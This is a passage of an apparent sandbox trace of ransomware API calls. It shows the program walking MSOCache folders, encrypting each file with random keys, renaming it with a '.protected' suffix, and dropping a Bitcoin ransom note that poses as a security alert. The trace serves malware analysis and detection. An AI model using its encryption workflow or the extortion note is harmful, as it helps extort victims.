lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0063.207] WriteFile (in: 
hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0063.207] CloseHandle (hObject=0xb4) returned 1 [0063.207] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.protected") returned 86 [0063.207] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.protected" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml.protected")) returned 1 [0063.208] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0063.208] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0063.208] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\RESTORE_FILES.txt") returned 84 [0063.208] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\RESTORE_FILES.txt" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0063.209] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0063.209] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0063.209] lstrlenA (lpString="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") returned 684 [0063.209] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0063.210] 
lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0063.210] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0063.210] CloseHandle (hObject=0xa4) returned 1 [0063.210] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0063.210] lstrcmpiW (lpString1="{91140000-0057-0000-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0063.210] lstrcmpiW (lpString1="{91140000-0057-0000-1000-0000000FF1CE}-C", lpString2="Program Files") returned -1 [0063.210] lstrcmpiW (lpString1="{91140000-0057-0000-1000-0000000FF1CE}-C", lpString2="Program Files (x86)") returned -1 [0063.210] lstrcmpiW (lpString1="{91140000-0057-0000-1000-0000000FF1CE}-C", lpString2="$Recycle.bin") returned 1 [0063.210] lstrcmpiW (lpString1="{91140000-0057-0000-1000-0000000FF1CE}-C", lpString2="System Volume Information") returned -1 [0063.210] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C") returned 66 [0063.210] lstrcmpW (lpString1="{91140000-0057-0000-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0063.210] lstrcmpW (lpString1="{91140000-0057-0000-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0063.210] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\*") returned 68 [0063.210] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x447cc0 [0063.231] lstrcmpiW 
(lpString1=".", lpString2="Windows") returned -1 [0063.231] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0063.231] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0063.231] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0063.231] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0063.231] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\.") returned 68 [0063.231] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0063.231] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0063.231] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0063.231] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0063.231] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0063.231] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\." 
(normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0063.231] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0063.231] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0063.231] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0063.231] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0063.231] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0063.231] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0063.231] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\..") returned 69 [0063.231] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0063.231] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0063.231] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0063.231] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0063.232] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0063.232] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0063.232] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\.." 
(normalized: "c:\\msocache\\all users"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0063.232] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0063.232] lstrcmpiW (lpString1="Office32WW.msi", lpString2="Windows") returned -1 [0063.232] lstrcmpiW (lpString1="Office32WW.msi", lpString2="Program Files") returned -1 [0063.232] lstrcmpiW (lpString1="Office32WW.msi", lpString2="Program Files (x86)") returned -1 [0063.232] lstrcmpiW (lpString1="Office32WW.msi", lpString2="$Recycle.bin") returned 1 [0063.232] lstrcmpiW (lpString1="Office32WW.msi", lpString2="System Volume Information") returned -1 [0063.232] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 81 [0063.232] StrStrIW (lpFirst="Office32WW.msi", lpSrch=".protected") returned 0x0 [0063.232] lstrcmpW (lpString1="Office32WW.msi", lpString2="RESTORE_FILES.txt") returned -1 [0063.232] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0063.232] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0063.232] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0063.232] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 81 [0063.232] StrStrW 
(lpFirst="Office32WW.msi", lpSrch=".txt") returned 0x0 [0063.232] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 81 [0063.232] StrStrW (lpFirst="Office32WW.msi", lpSrch=".rar") returned 0x0 [0063.232] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 81 [0063.233] StrStrW (lpFirst="Office32WW.msi", lpSrch=".zip") returned 0x0 [0063.233] ReadFile (in: hFile=0xb4, lpBuffer=0x49bc48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49bc48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0063.465] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0063.465] WriteFile (in: hFile=0xb4, lpBuffer=0x49bc48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49bc48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0063.615] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0063.615] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0063.631] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0063.631] CloseHandle (hObject=0xb4) returned 1 [0063.632] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi.protected") returned 91 [0063.632] MoveFileW 
(lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi.protected" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.msi.protected")) returned 1 [0063.632] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0063.632] lstrcmpiW (lpString1="Office32WW.xml", lpString2="Windows") returned -1 [0063.632] lstrcmpiW (lpString1="Office32WW.xml", lpString2="Program Files") returned -1 [0063.632] lstrcmpiW (lpString1="Office32WW.xml", lpString2="Program Files (x86)") returned -1 [0063.632] lstrcmpiW (lpString1="Office32WW.xml", lpString2="$Recycle.bin") returned 1 [0063.632] lstrcmpiW (lpString1="Office32WW.xml", lpString2="System Volume Information") returned -1 [0063.632] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 81 [0063.633] StrStrIW (lpFirst="Office32WW.xml", lpSrch=".protected") returned 0x0 [0063.633] lstrcmpW (lpString1="Office32WW.xml", lpString2="RESTORE_FILES.txt") returned -1 [0063.633] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0063.633] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0063.633] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0063.633] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 81 [0063.633] StrStrW (lpFirst="Office32WW.xml", lpSrch=".txt") returned 0x0 [0063.633] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 81 [0063.633] StrStrW (lpFirst="Office32WW.xml", lpSrch=".rar") returned 0x0 [0063.633] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 81 [0063.633] StrStrW (lpFirst="Office32WW.xml", lpSrch=".zip") returned 0x0 [0063.633] ReadFile (in: hFile=0xb4, lpBuffer=0x49bc48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49bc48*, lpNumberOfBytesRead=0x295f174*=0x10b2, lpOverlapped=0x0) returned 1 [0063.644] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffef4e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0063.645] WriteFile (in: hFile=0xb4, lpBuffer=0x49bc48*, nNumberOfBytesToWrite=0x10b2, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49bc48*, lpNumberOfBytesWritten=0x295f174*=0x10b2, lpOverlapped=0x0) returned 1 [0063.645] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0063.645] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0063.645] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0063.645] CloseHandle (hObject=0xb4) 
returned 1 [0063.646] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.protected") returned 91 [0063.646] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.protected" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml.protected")) returned 1 [0063.646] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0063.646] lstrcmpiW (lpString1="ose.exe", lpString2="Windows") returned -1 [0063.646] lstrcmpiW (lpString1="ose.exe", lpString2="Program Files") returned -1 [0063.646] lstrcmpiW (lpString1="ose.exe", lpString2="Program Files (x86)") returned -1 [0063.646] lstrcmpiW (lpString1="ose.exe", lpString2="$Recycle.bin") returned 1 [0063.646] lstrcmpiW (lpString1="ose.exe", lpString2="System Volume Information") returned -1 [0063.646] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 74 [0063.646] StrStrIW (lpFirst="ose.exe", lpSrch=".protected") returned 0x0 [0063.646] lstrcmpW (lpString1="ose.exe", lpString2="RESTORE_FILES.txt") returned -1 [0063.646] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0063.646] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0063.646] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All 
Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\ose.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0063.651] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 74 [0063.651] StrStrW (lpFirst="ose.exe", lpSrch=".txt") returned 0x0 [0063.651] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 74 [0063.651] StrStrW (lpFirst="ose.exe", lpSrch=".rar") returned 0x0 [0063.651] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 74 [0063.651] StrStrW (lpFirst="ose.exe", lpSrch=".zip") returned 0x0 [0063.651] ReadFile (in: hFile=0xb4, lpBuffer=0x49bc48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49bc48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0063.672] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0063.672] WriteFile (in: hFile=0xb4, lpBuffer=0x49bc48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49bc48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0063.672] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0063.672] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0063.680] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, 
lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0063.680] CloseHandle (hObject=0xb4) returned 1 [0063.680] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe.protected") returned 84 [0063.685] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\ose.exe"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe.protected" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\ose.exe.protected")) returned 1 [0063.686] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0063.686] lstrcmpiW (lpString1="osetup.dll", lpString2="Windows") returned -1 [0063.686] lstrcmpiW (lpString1="osetup.dll", lpString2="Program Files") returned -1 [0063.686] lstrcmpiW (lpString1="osetup.dll", lpString2="Program Files (x86)") returned -1 [0063.686] lstrcmpiW (lpString1="osetup.dll", lpString2="$Recycle.bin") returned 1 [0063.686] lstrcmpiW (lpString1="osetup.dll", lpString2="System Volume Information") returned -1 [0063.686] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 77 [0063.686] StrStrIW (lpFirst="osetup.dll", lpSrch=".protected") returned 0x0 [0063.686] lstrcmpW (lpString1="osetup.dll", lpString2="RESTORE_FILES.txt") returned -1 [0063.686] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0063.686] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: 
pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0063.686] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\osetup.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0063.687] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 77 [0063.687] StrStrW (lpFirst="osetup.dll", lpSrch=".txt") returned 0x0 [0063.687] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 77 [0063.687] StrStrW (lpFirst="osetup.dll", lpSrch=".rar") returned 0x0 [0063.687] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 77 [0063.687] StrStrW (lpFirst="osetup.dll", lpSrch=".zip") returned 0x0 [0063.688] ReadFile (in: hFile=0xb4, lpBuffer=0x49bc48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49bc48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0063.915] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0063.915] WriteFile (in: hFile=0xb4, lpBuffer=0x49bc48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49bc48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0063.915] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0063.916] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, 
lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0064.049] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0064.049] CloseHandle (hObject=0xb4) returned 1 [0064.049] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll.protected") returned 87 [0064.049] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\osetup.dll"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll.protected" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\osetup.dll.protected")) returned 1 [0064.050] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) 